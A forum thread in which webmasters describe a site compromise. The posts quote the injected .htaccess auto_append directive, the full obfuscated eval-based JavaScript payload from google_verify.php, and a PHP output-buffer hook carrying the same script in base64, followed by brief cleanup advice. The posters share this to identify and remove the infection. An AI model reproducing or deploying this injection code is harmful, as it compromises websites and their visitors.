Couple days ago I had problems with my sites. In all ftp servers I got some php file called google_verify.php and in my .htaccess file the following text was added:
<IfModule mod_php5.c>
php_value auto_append_file "google_verify.php"
</IfModule>
<IfModule mod_php4.c>
php_value auto_append_file "google_verify.php"
</IfModule>
Here is google_verify.php file:
<script>d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un
L-L #u #y #J LA9 N ,e #q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2
-z=null}}if(! z Ztypeof M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv
_>, =vars Z 4== =vars A= /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= %
Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS
-v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H $rs So 6\'q\')
8\'\') 6\'v\') I Hi=0;i< $rs hrs[i]=parseInt( $rs[i],16)- k = $rs 8\',\')+
\',\'}else{ajax gr.offset2=25; = k}; 9unR ( !){eval( 9 ]UrN L db&& Yt 7 -H( Yt W} 3
drt 7 OR + rt SR}} c(" $a",new Date().getTime()); $h : / ]Ikey in( t) Zfalse== C1]&&
4== b A$T= v(key, C0] W ,t[key] ?t[ $T[0] [$T[1] W;key ST[0]} $h[ $h 7]=key+"="+
C0]} 3$R Oh 8 Yx) + rt+ Sh 8 Yx)} Uk L-B="POS <t="";d=\'v={# VM$1XH:"e-",#
V`$1XH:"",*b VM$1Xv30:"l(\\\'l=Str"
\\\\_:"ing.fr",JG*2%a%fzV*aV:"omCha",>%8%8*2*5LB0_*4:"rCode("
<6#fF%3#f#7#d_$4y<d*3*6$eV*e*d$a*3&6R8#b!0G%4#d%eTM `8B6P*3K#6>*4HY/c*dPB1JJ-
a$4*6&9<7E*bQ`NX#U&3W2E*eQ*4?Q*2E&7W5!3%b#e#8!0*8#6J `6PV#c#9!fB3*1V&6W9*7#f%6-3*d#f-
d-fy,a2%2#e T T#c!1&1/b#eT!1#c!1*4*b-d&1/4-f#f%6%2#d
^5`y<4?T*5KUB6P*3Y/9*eZw*5#a#9A*7&9/1#U TLP
T&1D3HK%8>O#w*5Y/9O~T##6T#~&9D1ZwJB6A*eZG&9,d5H*3#8#7E*5?%8&7/d-eF!fJ-eFG%6y
/6B0!2G_%3#f_%3yD0%1EJ%1EHwA&5,d0#$f!2#e$1MX?yD1*9U%aAGA*9A&9,a2#7G-a?*1-bM?I
/1-0-7%4%1$4T#d-c `9J?%8J%3AGE&7Df*e!0*cZA#b!3*2
`aH-aOB7B7OJGI<2?GJ#aPP?$e&1W5%4z$1*7Gz$1*5I/3*4#d*0!3`!0F!0 `8$dO%6`
%4$4%b!f&5D4OOOB0#eVN-1&3W0*3$b!3*b*aw*0$b&3De%a#UB0#e-dN-1&3W2>M-
3*0K*2*5_&5WeOA%7*3#6-7%e*3&6/4%7!fN f&1,a6M$f_*b#7B1B1#7&5D7#f%a$3XUFPZ
e9QMAU$1JB4U&9Wf*5*8#$1>U>#YR1
%4Q%6%4UQ%6#7&9Rb$f%fzB3B7*5?*fI/9$1*4#eUUA$1*2&6D6^F#8~#b%0%0F ea%7%eN%7!2
^7?y/5Z#e#b$e$e_Z*0yD6~GF#8^#c%0%0&4D9#8O>HB5>*d#Y<9*5*5#8>*6>>#7YW1^??*4B7?*fGI
<7*4#6V*eOA$0V&6/2##d-awA-f#f_yW5!0#b-8*aE-d#d!3&0Wd%8*3%0$e!fT*5#YWeGB7J-
aB2AAH&9<9%7`-b$e|$3-b$b&5R4$b-d$d$4|-d$4$3 j6-9Q$b%e-9w%7X&3,ac%8zK-c$f$b|-c&6R4%aM-
dN%aB1-d%e j7$a?U-4Q!3!3?&3<2-7%3-7%4-7T-7%6&1,af%f-f$0-f$1-f$3-f&9R3%0N%0X%0M%0`I,acN-
cX-cM-c`-c&6Rc-f$d-f$e-f$f-fB0&9,ac$e-c$f-cB0G!f-
7&6,a0FF#7H#6H^H&4D9P#aP#bP#cP#d&5D2#f!f*1A`$a*3*6&6/4-4GF%6GF*fG&1
/4T!1_AAAF*f&1D3H#KJ#-bPPYD2!f?KT?-aHP&7/6%7ULV-6UB0-4&3R5!fV$d!fV$4!fV&3<7P>$a-
6MM_*b&5RczPJ^#b!3N#d `8M|G-d$bU%2P&5,a9*b>-eG-9%8>-e&1/fV%4ULVNN#e&3/6N*0VQ-
e!3>*4&3W3 ^4#8^#E~#8y<2H>$4%0_?*6*6&5/b#e#e~ ^4_$4zy<0#eV$d*0!3#c#6!3&3W4OJ#-
fG!2#b#6y/2*4OJ#-f#d_$3yW2_^*fU%2H_#7&5/8M$fL%2H_^*f&5/a%0G!3^VN$dU&3<6*4A-
4#fJL#b*0&9D1T*3#-a*5>-3>YD9#9#bH%4-8|$a*4 j5*2#b#6*2#f#6*1#eID0#b#8H#d#6H^#b
ed#9OG#8~G#9P&1D3#a#7O#f#9O#e#e&7/dO#6GJJGJP&1D5#a#9^#f#a^#a#a&9
/f#8#9!f#8#8!f~~&3D3#c#aO#dO#c#aO&7D9L~LOLJL#6yW0T*3%eM$aH>^Y<d*1~#fZ*0EXM
ea*4*5$3^^OB5GIR4N-d%b-f#f-5X$4y<e$3KO%bM$4Q*8&5<b%4N*6Q%7%8#K&3D4U$bz
%4Q%6~#b&9DbHB4E~|*4L%f&7R7M$3#dJJ?LV&3<aO#B2O#|O#YRc^G-c^GB3T%2IWaE-
dGP-d#EL&0<3%fZ!fE#!3Q$3&0D1ZQK$1#??U&3Db!3*3>!0#8*2|*9&0<cH!fK#b!fP~!fYW0%8Z$aF*eFH%0
ec*8*6?#f?$dzZIDd-c!2E#Q#E-c
`6F$bZ%8`K*1^&4D9#9A$1%eQ$0$1$d&9W1#c~*2*0OF#9F&4,a1B1B1#fE*5*1*4E&4<aE#E?-b^%a|
j9T`w*9$0w$1w&4R3|G>%8LB2*0>&5W8*2*5>-2P>NL&5,d1A-3~%f$4$4%b`&6,a0-
c-5-4*5#`B5*3Y/dzB2*7*a?-2*f#I/2*6 ^b ^a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA-
1*5`$e$dP&9/3Q`UJHH!0#&0<2$b*5>*c*3%2$b>YWc*0MN`%8#e-d$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^-
5*c*1E&4W3?A%6%b`A##dy/9*9LA*eJG*2%a&6<aM!1%aT#e TT&1DcT#A-3ZQz|&9<c%1|#a%e%f%eT#b
`2L#d-eF ^f#d_yRf>L-0P-9X>#fYDd ^9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA-
bH&0<4-8*dE>N-eE*6 ja!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz
ee!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<6MKQ$1#-4#e!3&3/d!3-6EUE-
7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5
fHT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7
/f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8|| j4z#!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ-
6MNK$1&3<9?##d_!2V#$dyR7%a|$aM$3_?G&5/f!f-f%eL%4G#7$f&7/5#O%6NN%a$3w&5Wb$0$1$4KH#>HY
/8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b
%0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK-
fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/9$b!f#V#aUU%f&6D2ZQ%8wz-3%aU
edVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a-
b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a| jd$4`#GF#cE-8&4D3K%a|*a$1
%aQ%a&5R6z>*1#M%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L-
0$fXX%3%f%bIR4?##d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f
^1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d
`6XPQwwX%8M&3/8*f#$b#6#>-0PY,d2EE-0^E#c-3X j9KZK>-2>$bzY,d1$4Z*5%4?>-3#Y<2#d!0HXE-
d?!0&0WdE$3%fT#e TU&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy
/8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU
ea~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y
/4*2F*3F*6F*7F&4W8F*9F*aF*bF*c
e1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`Q
MP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\\\\E:"32);ev",*``ZXK*b$0$1:"al(l)
\\\'",EE!0*9Q>!0#8*2:");"};dk=[] I-r x in v){dk.push(trim(x,v))};e-l(dk
8\\\'\\\'))!v7#v8$vc%vb&:8*v9+,q-
va/+7<,b>!8?!a#!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+
9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\\\\,#6^L%2*0>$f*2\' Ic=46;c--;d=(t=d
6\'!#$%&*+-/<>?#ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\\\'[c])) 8t.pop())); 9 (=d K &};
9unAJAX L dE -q ]+ rN( $R); 3 rr -A 2 Yr)} 3 z){ Hself=this; 3 B=="GET" A$K= F+ i+
Yt , R$K W + R F W;try{ z.setRequestHeader("Content-Type","application/x-www-form-
urlencoded" 5){}} z.onreadystatechange !){switch( #z.readyState){case 1: #L 02: #u
03: #y 04: ;= #z.r (Text; ;XML= #z.r (XML; #C[0 Q; #C[1 QText; 3#w){self.r N 3#A A)=
#A.nodeName; ).toLowerCase(); 3)=="input Jselect Joption Jtextarea" A#A. >= ;
+#A.innerHTML= ;}} 3#C[0]=="200" A#J ]+#e()} #rt="";break} Uz.send( Yt)}} Um ],rg()}
a.ajax : $M();try{ H $G 2\' $D\') *c("query", $G gd gf) *F="query.php" *B SG gB gf
*rr=\' $rz\' *L SN *u Sg *y Ss *J Sx; P 5){ P)} this g !=function( #self g $kx_
%encodeURIComponent( &e ,rr ?A ?F=file ,t :Object ],C : /(2) (esponse )elemNodeName
*;ajax g +}else{ ,; - A .try{ z :ActiveXObject("M /Array 0();break;case
2=document.getElementById( 3if( 4true 5)}catch(e 6.split( 7.length 8.join( 9this.r
:=new ;self.r ( <T" ,i="?" ,rx="&" ,r =return >value ?=null , # !){ U A){ C t[key][
G( $j[0], $j[1]) Hvar I;for( J"|| )==" K ,b= 4 ,w=fals L ! MXMLHttpRequest NunR (()}
O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open( B, S= $ T-d!3 U} , V%b%a#6Q W,
4) X.XMLHTTP" 5 Y r Z){if( []= /( ]() ^!2* _ L$o, `&0/ awindow d$R A3 e&4/
f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split(' ! # $ % & ( )
* + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? # A C G H I J K L M N O P Q R S T U V W X Y
Z [ ] ^ _ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)</script>
I suspect that my pc is infected with some kind of virus who can read my ftp access parameters from my ftp manager.
Does anybody know something more about this virus and how I can clean my computer?
Thanks in advance
I am no security specialist but one of my sites got the same file. From my limited knowledge and research what happened is that your site got hacked and the google_verify.php file is part of an injection attack.
You should also check other files of you website (specially the index.php/htm/html) and look for:
ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kPSdmdW5jdGlvbiAgJE0oZmlsZSAteiA/UCBMLUI9IkdFIDw9IGEgLHJ0PSIiIEtlICxFPXRydSAmICxyLm9mZnNldD0xMDAgVW4gTC1MIEB1IEB5IEBKIExBOSBOICxlIEBxIExBOSBOIFVtIEwtbiBdLFAgXVVyZyBMLWsoKTsgLnN4bWwyIFgxIEEuaWNyb3NvZnQgWDIgLXo9bnVsbH19aWYoISAgeiBadHlwZW9mICBNIT0idW5kZWZpbmVkIiAteiA6IE0gXSsgRT0gNH19IFVjIF8+IC10WyAkbyBbPixmYWxzZSkgVXYgXz4sID12YXJzIFogND09ID12YXJzIEE9ICAvKCAlICRvKSwgJSA+KSkgKyB0WyAlICRvKSBbJSA+KSBXfSBVSCBMJHAsICRTIEEkVD0gJSBZeCk7cmVnZXhwIDpSZWdFeHAoIFl4KyJ8IisgJFQpOyBILyBTcCA2cmVnZXhwKSBJaT0wO2k8IEgvIGhqPSBIL1tpXSA2Ij0iKTtpZiggND0gU1MgLXYgRyArIGMgR319fTsgYS50cmltIF8kZiBaInFhYmNkZWYiLmluZGV4T2YoICRvLnN1YnN0cigwLDEpKT49MCl7IEggJHJzIFNvIDZcJ3FcJykgOFwnXCcpIDZcJ3ZcJykgSSBIaT0wO2k8ICRycyBocnNbaV09cGFyc2VJbnQoICRyc1tpXSwxNiktIGsgPSAgJHJzIDhcJyxcJykrXCcsXCd9ZWxzZXthamF4IGdyLm9mZnNldDI9MjU7ID0gIGt9OyA5dW5SICggISl7ZXZhbCggOSAgXVVyTiBMIGRiJiYgWXQgNyAtSCggWXQgV30gMyBkcnQgNyBPUiArIHJ0IFNSfX0gIGMoIiAkYSIsbmV3IERhdGUoKS5nZXRUaW1lKCkpOyAkaCA6IC8gXUlrZXkgaW4oICB0KSBaZmFsc2U9PSBDMV0mJiA0PT0gIGIgQSRUPSAgdihrZXksIEMwXSBXICx0W2tleV0gP3RbICRUWzBdIFskVFsxXSBXO2tleSBTVFswXX0gJGhbICRoIDddPWtleSsiPSIrIEMwXX0gMyRSIE9oIDggWXgpICsgcnQrIFNoIDggWXgpfSBVayBMLUI9IlBPUyA8dD0iIjtkPVwndj17QCBWTSQxWEg6ImUtIixAIFZgJDFYSDoiIiwqYiBWTSQxWHYzMDoibChcXFwnbD1TdHIiXFxcXF86ImluZy5mciIsSkcqMiVhJWZ6ViphVjoib21DaGEiLD4lOCU4KjIqNUxCMF8qNDoickNvZGUoIjw2I2ZGJTMjZiM3I2RfJDR5PGQqMyo2JGVWKmUqZCRhKjMmNlI4I2IhMEclNCNkJWVUTSBgOEI2UCozSyM2Pio0SFkvYypkUEIxSkotYSQ0KjYmOTw3RSpiUWBOWEBVJjNXMkUqZVEqND9RKjJFJjdXNSEzJWIjZSM4ITAqOCM2SiBgNlBWI2MjOSFmQjMqMVYmNlc5KjcjZiU2LTMqZCNmLWQtZnksYTIlMiNlIFQgVCNjITEmMS9iI2VUITEjYyExKjQqYi1kJjEvNC1mI2YlNiUyI2QgXjVgeTw0P1QqNUtVQjZQKjNZLzkqZVp3KjUjYSM5QSo3JjkvMUBVIFRMUCBUJjFEM0hLJTg+T0B3KjVZLzlPflRAIzZUQH4mOUQxWndKQjZBKmVaRyY5LGQ1SCozIzgjN0UqNT8lOCY3L2QtZUYhZkotZUZHJTZ5LzZCMCEyR18lMyNmXyUzeUQwJTFFSiUxRUh3QSY1LGQwQCRmITIjZSQxTVg/eUQxKjlVJWFBR0EqOUEmOSxhMiM3Ry1hPyoxLWJNP0kvMS0wLTclNCUxJDRUI2QtYyBgOUo/JThKJTNBR0UmN0RmKmUhMCpjWkEjYiEzKjIgYGFILWFPQjdCN09KR0k8Mj9HSiNhUFA/JGUmMVc1JTR6JDEqN0d6JDEqNUkvMyo0I2QqMCEzYCEwRiEwIGA4JGRPJTZgJTQkNCViIWYmNUQ0T09PQjAjZVZOLTEmM1cwKjMkYiEzKmIqYXcqMCRiJjNEZSVhQFVCMCNlLWROLTEmM1cyPk0tMyowSyoyKjVfJjVXZU9BJTcqMyM2LTclZSozJjYvNCU3IWZOIGYmMSxhNk0kZl8qYiM3QjFCMSM3JjVENyNmJWEkM1hVRlBaIGU5UU1BVSQxSkI0VSY5V2YqNSo4QCQxPlU+QFlSMSU0USU2JTRVUSU2IzcmOVJiJGYlZnpCM0I3KjU/KmZJLzkkMSo0I2VVVUEkMSoyJjZENl5GIzh+I2IlMCUwRiBlYSU3JWVOJTchMiBeNz95LzVaI2UjYiRlJGVfWioweUQ2fkdGIzheI2MlMCUwJjREOSM4Tz5IQjU+KmRAWTw5KjUqNSM4Pio2Pj4jN1lXMV4/Pyo0Qjc/KmZHSTw3KjQjNlYqZU9BJDBWJjYvMkAjZC1hd0EtZiNmX3lXNSEwI2ItOCphRS1kI2QhMyYwV2QlOCozJTAkZSFmVCo1QFlXZUdCN0otYUIyQUFIJjk8OSU3YC1iJGV8JDMtYiRiJjVSNCRiLWQkZCQ0fC1kJDQkMyBqNi05USRiJWUtOXclN1gmMyxhYyU4ekstYyRmJGJ8LWMmNlI0JWFNLWROJWFCMS1kJWUgajckYT9VLTRRITMhMz8mMzwyLTclMy03JTQtN1QtNyU2JjEsYWYlZi1mJDAtZiQxLWYkMy1mJjlSMyUwTiUwWCUwTSUwYEksYWNOLWNYLWNNLWNgLWMmNlJjLWYkZC1mJGUtZiRmLWZCMCY5LGFjJGUtYyRmLWNCMEchZi03JjYsYTBGRiM3SCM2SF5IJjREOVAjYVAjYlAjY1AjZCY1RDIjZiFmKjFBYCRhKjMqNiY2LzQtNEdGJTZHRipmRyYxLzRUITFfQUFBRipmJjFEM0hAS0pALWJQUFlEMiFmP0tUPy1hSFAmNy82JTdVTFYtNlVCMC00JjNSNSFmViRkIWZWJDQhZlYmMzw3UD4kYS02TU1fKmImNVJjelBKXiNiITNOI2QgYDhNfEctZCRiVSUyUCY1LGE5KmI+LWVHLTklOD4tZSYxL2ZWJTRVTFZOTiNlJjMvNk4qMFZRLWUhMz4qNCYzVzMgXjQjOF5ARX4jOHk8Mkg+JDQlMF8/KjYqNiY1L2IjZSNlfiBeNF8kNHp5PDAjZVYkZCowITMjYyM2ITMmM1c0T0pALWZHITIjYiM2eS8yKjRPSkAtZiNkXyQzeVcyX14qZlUlMkhfIzcmNS84TSRmTCUySF9eKmYmNS9hJTBHITNeVk4kZFUmMzw2KjRBLTQjZkpMI2IqMCY5RDFUKjNALWEqNT4tMz5ZRDkjOSNiSCU0LTh8JGEqNCBqNSoyI2IjNioyI2YjNioxI2VJRDAjYiM4SCNkIzZIXiNiIGVkIzlPRyM4fkcjOVAmMUQzI2EjN08jZiM5TyNlI2UmNy9kTyM2R0pKR0pQJjFENSNhIzleI2YjYV4jYSNhJjkvZiM4IzkhZiM4IzghZn5+JjNEMyNjI2FPI2RPI2MjYU8mN0Q5TH5MT0xKTCM2eVcwVCozJWVNJGFIPl5ZPGQqMX4jZloqMEVYTSBlYSo0KjUkM15eT0I1R0lSNE4tZCViLWYjZi01WCQ0eTxlJDNLTyViTSQ0USo4JjU8YiU0Tio2USU3JThASyYzRDRVJGJ6JTRRJTZ+I2ImOURiSEI0RX58KjRMJWYmN1I3TSQzI2RKSj9MViYzPGFPQEIyT0B8T0BZUmNeRy1jXkdCM1QlMklXYUUtZEdQLWRARUwmMDwzJWZaIWZFQCEzUSQzJjBEMVpRSyQxQD8/VSYzRGIhMyozPiEwIzgqMnwqOSYwPGNIIWZLI2IhZlB+IWZZVzAlOFokYUYqZUZIJTAgZWMqOCo2PyNmPyRkelpJRGQtYyEyRUBRQEUtYyBgNkYkYlolOGBLKjFeJjREOSM5QSQxJWVRJDAkMSRkJjlXMSNjfioyKjBPRiM5RiY0LGExQjFCMSNmRSo1KjEqNEUmNDxhRUBFPy1iXiVhfCBqOVRgdyo5JDB3JDF3JjRSM3xHPiU4TEIyKjA+JjVXOCoyKjU+LTJQPk5MJjUsZDFBLTN+JWYkNCQ0JWJgJjYsYTAtYy01LTQqNUBgQjUqM1kvZHpCMio3KmE/LTIqZkBJLzIqNiBeYiBeYSo3ITJPeUQzJTckNHckZSoyKjIkMyRhJjVSNU5BLTEqNWAkZSRkUCY5LzNRYFVKSEghMEAmMDwyJGIqNT4qYyozJTIkYj5ZV2MqME1OYCU4I2UtZCRhJjNXNT4jOSM2JWFNS0IxKjNZLGFlLTgqMUZeLTUqYyoxRSY0VzM/QSU2JWJgQUAjZHkvOSo5TEEqZUpHKjIlYSY2PGFNITElYVQjZSBUVCYxRGNUQEEtM1pRenwmOTxjJTF8I2ElZSVmJWVUI2IgYDJMI2QtZUYgXmYjZF95UmY+TC0wUC05WD4jZllEZCBeOSo0I2YhMiNhTio0eVJiLTYlM3ctMCUzJWYlNz95LzclOFQlMSU0RUEtYkgmMDw0LTgqZEU+Ti1lRSo2IGphITMqZio5VSNlVio1ITMmMy9kTkhCNEI0QjQqMiUxfCY3UmMqMUVYeiNmRVh6IGVlIWZBJDEkZVQ/flomNjw1JDQtNS00KjMqMCU2TiVlJjA8Nk1LUSQxQC00I2UhMyYzL2QhMy02RVVFLTdMJDMmMDxkeio5enokYSQxJWEkZFlSY1pIIWYkYiRhJWIhZn5ZPDFFWnx8TiNmfn4mNTw5YCQxIzZ6JGYkMXp6WTxiYH53TiQzXiM3XiY2UjUgZkhUJTImMTxjJWZ6UFpYUSQxKjImMyxhZUEkMCUxR0ElMFYqYSY2RDhHJWFMLTd8YCRlUUkvZkhKIzhCNSpiJTgkYksmNy9mJTMlM0xIKjV+IzhFJjdEZkYqOEFePyExSCExJjEvNyo0TkskZUUqOHx8IGo0ekAhM0YqMC0wJTRNJjNSMCM2JGF3WEtNTkhZL2NQTVEtNk1OSyQxJjM8OT9AI2RfITJWQCRkeVI3JWF8JGFNJDNfP0cmNS9mIWYtZiVlTCU0RyM3JGYmNy81QE8lNk5OJWEkM3cmNVdiJDAkMSQ0S0hAPkhZLzgqY0cjOUxfI2YqMCU3JjVSNndUJWZCMUZMRio3JjQ8YiUwViUxRiFmR0IxdyY0PGMkM1QkYiEwVVh3JDMmMDw5JTJ3S3ckNHwjYSU4JjBSMUtLWlg+XiRld1lSNkZGSkVLLWZaJTEmNDw1KjAlNyM4JGIkZiVmekIzSUQzX35PJThaJTZNKjgmNVI4WiVlKmEkZFAjYUEqYiY5LzkkYiFmQFYjYVVVJWYmNkQyWlElOHd6LTMlYVUgZWRWViM2QU4lMUxMJjY8MUEjYVpgSyRlWCVlJjlSMFghMiM3JWIlOCQ0JTMlZnk8YlYjYyVhfnwlYiRhLWImNixhNSo0JGZUXyRmP0whMSYxRGUqND8qOCFmTCRhJWF8IGpkJDRgQEdGI2NFLTgmNEQzSyVhfCphJDElYVElYSY1UjZ6PioxQE0lM0g+WS9lI2MjYyNhI2FKKjcqN0EmOURlSiQwd1ElYmBLRiY0VzVMLTAkZlhYJTMlZiViSVI0P0AjZCEyI2VOJTdYeSxhYSVmJDMlYlYqNCFmQjFBJjY8MyNmIF4xVCUzJWUlZSU0eTxhSyQ0KjYlMyRiQSpiSiY5RDFWIzhWKjlBLTElMSUyJjYvOT9FKmIkZSQwTiViWCY3UjchMCo1dyU2PiEwKjYjZCBgNlhQUXd3WCU4TSYzLzgqZkAkYiM2QD4tMFBZLGQyRUUtMF5FI2MtM1ggajlLWks+LTI+JGJ6WSxkMSQ0Wio1JTQ/Pi0zQFk8MiNkITBIWEUtZD8hMCYwV2RFJDMlZlQjZSBUVSYxLzYhMy0wKjEjZkolN0t8JjNXNEchZj4qMUtOYEwmNjw1I2YjYSM5I2RUI2QlNiNmeS84JDQjZCU0TCQzJDBLdyYwUjY/QV9WKjItMy04LTl5PDIlNCVhQjglNiU2Pz8/SS81Rj5GQUY/RlUgZWF+P14/IzY/Izc/SUQ3QSM4QSNiQSNkQSM5JjkvNSM2XyNhXyNiXyNjXyY1VzA+KjE+KjI+KjM+KjRZLzQqMkYqM0YqNkYqN0YmNFc4Rio5RiphRipiRipjIGUxKmEhMSpiITEqYyExKmQhMSYxLGE3UCM4JGQkZkskZCRlekkvOSU0TCNlQXwjZSU0I2QmMUQ5I2IqNyM5KjIjYVB+QjBZRDJKSiM3JDNgUU1QJjlSZSM4JGF8JGFKT09PSURjJTZNJTJaQVQ/JjFcXFxcRToiMzIpO2V2IiwqYGBaWEsqYiQwJDE6ImFsKGwpXFxcJyIsRUUhMCo5UT4hMCM4KjI6Iik7In07ZGs9W10gSS1yIHggaW4gdil7ZGsucHVzaCh0cmltKHgsdikpfTtlLWwoZGsgOFxcXCdcXFwnKSkhdjcjdjgkdmMldmImOjgqdjkrLHEtdmEvKzc8LGI+ITg/IWFAIWJBITlCdmREKzhFITdGITRHIWRIIzBJOjkwSiMySyVjTCFlTSQ3TiQ1TyMzUCMxUSQyUixjVCU1VSFjViE2Vys5WCQ2WSY4WiVkXiM1XyE1YCQ4dyU5eSYyeiRjfCQ5fiM0XFxcXCwjNl5MJTIqMD4kZioyXCcgSWM9NDY7Yy0tO2Q9KHQ9ZCA2XCchIyQlJiorLS88Pj9AQUJERUZHSElKS0xNTk9QUVJUVVZXWFlaXl9gd3l6fH5cXFxcXCdbY10pKSA4dC5wb3AoKSkpOyA5ICg9ZCBLICZ9OyA5dW5BSkFYIEwgZEUgLXEgXSsgck4oICRSKTsgMyByciAtQSAyIFlyKX0gMyB6KXsgSHNlbGY9dGhpczsgMyBCPT0iR0VUIiBBJEs9ICBGKyAgaSsgWXQgLCBSJEsgVyArICBSIEYgVzt0cnl7ICB6LnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIgNSl7fX0gIHoub25yZWFkeXN0YXRlY2hhbmdlICEpe3N3aXRjaCggI3oucmVhZHlTdGF0ZSl7Y2FzZSAxOiAjTCAwMjogI3UgMDM6ICN5IDA0OiA7PSAjei5yIChUZXh0OyA7WE1MPSAjei5yIChYTUw7ICNDWzAgUTsgI0NbMSBRVGV4dDsgMyN3KXtzZWxmLnIgTiAzI0EgQSk9ICNBLm5vZGVOYW1lOyApLnRvTG93ZXJDYXNlKCk7IDMpPT0iaW5wdXQgSnNlbGVjdCBKb3B0aW9uIEp0ZXh0YXJlYSIgQSNBLiA+PSA7ICsjQS5pbm5lckhUTUw9IDt9fSAzI0NbMF09PSIyMDAiIEEjSiBdKyNlKCl9ICNydD0iIjticmVha30gVXouc2VuZCggWXQpfX0gVW0gXSxyZygpfSBhLmFqYXggOiAkTSgpO3RyeXsgSCAkRyAyXCcgJERcJykgKmMoInF1ZXJ5IiwgJEcgZ2QgZ2YpICpGPSJxdWVyeS5waHAiICpCIFNHIGdCIGdmICpycj1cJyAkcnpcJyAqTCBTTiAqdSBTZyAqeSBTcyAqSiBTeDsgUCA1KXsgUCl9ICB0aGlzIGcgIT1mdW5jdGlvbiggI3NlbGYgZyAka3hfICVlbmNvZGVVUklDb21wb25lbnQoICZlICxyciA/QSA/Rj1maWxlICx0IDpPYmplY3QgXSxDIDogLygyKSAoZXNwb25zZSApZWxlbU5vZGVOYW1lICo7YWpheCBnICt9ZWxzZXsgICw7ICAgLSBBICAudHJ5eyAgeiA6QWN0aXZlWE9iamVjdCgiTSAvQXJyYXkgMCgpO2JyZWFrO2Nhc2UgIDI9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIDNpZiggIDR0cnVlIDUpfWNhdGNoKGUgNi5zcGxpdCggNy5sZW5ndGggOC5qb2luKCA5dGhpcy5yIDo9bmV3ICA7c2VsZi5yICggPFQiICxpPSI/IiAscng9IiYiICxyID1yZXR1cm4gPnZhbHVlID89bnVsbCAsIEAgISl7IFUgQSl7ICBDICB0W2tleV1bIEcoICRqWzBdLCAkalsxXSkgSHZhciAgSTtmb3IoIEoifHwgKT09IiBLICxiPSA0ICx3PWZhbHMgTCAhICBNWE1MSHR0cFJlcXVlc3QgTnVuUiAoKCl9IE8gLXJ0Kz0gWXgrICQgUGFqYXgucnVuQUpBWCggUV09ICN6LnN0YXR1cyBSei5vcGVuKCAgQiwgIFM9ICQgVC1kITMgVX0gLCBWJWIlYSM2USBXLCA0KSBYLlhNTEhUVFAiIDUgWSAgciBaKXtpZiggW109IC8oICBdKCkgIF4hMiogXyBMJG8sICBgJjAvIGF3aW5kb3cgZCRSIEEzICBlJjQvIGYkMyU2JWZUJDQgZy4gJCBoIDc7aSsrIEEkIGomNzwgayAkZlsgJG9dfSc7Zm9yKGM9MTMwO2M7ZD0odD1kLnNwbGl0KCcgICAhICMgJCAlICYgKCApICogKyAsIC0gLiAvIDAgMiAzIDQgNSA2IDcgOCA5IDogOyA8ID0gPiA/IEAgQSBDIEcgSCBJIEogSyBMIE0gTiBPIFAgUSBSIFMgVCBVIFYgVyBYIFkgWiBbIF0gXiBfIGAgYSBkIGUgZiBnIGggaiBrJy5zdWJzdHIoYy09KHg9YzwyPzE6MikseCkpKS5qb2luKHQucG9wKCkpKTtldmFsKGQpPC9zY3JpcHQ+');}
It seems that this virus/malware is affecting several CMS such as Joomla, Wordpress, CodeIgniter, etc. Some more info here and here.
Best course of action:
change ALL ftp and username passwords QUICKLY
uninstall all FTP program(s) on your pc
